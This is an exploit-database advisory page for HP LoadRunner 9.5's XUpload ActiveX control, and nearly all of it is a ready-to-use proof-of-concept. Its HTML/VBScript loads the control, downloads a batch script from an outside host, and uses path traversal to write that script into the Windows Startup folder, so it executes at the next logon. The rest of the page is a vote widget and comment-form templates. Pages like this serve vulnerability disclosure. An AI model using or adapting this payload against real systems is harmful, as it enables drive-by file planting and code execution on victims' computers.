HP LoadRunner 9.5 Persits.XUpload.2 control remote file creation

2009-09-30 / 2009-10-01
Credit: pyrokinesis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc (IE 8) by Nine:Situations:Group::pyrokinesis CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003} Progid: Persits.XUpload.2 Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx KillBitted: False Implements IObjectSafety: True Safe For Initialization (IObjectSafety): True Safe For Scripting (IObjectSafety): True --> <html> <object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' /> </object> <script language='vbscript'> ' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh_9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd" UserAgent="" Headers="" XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top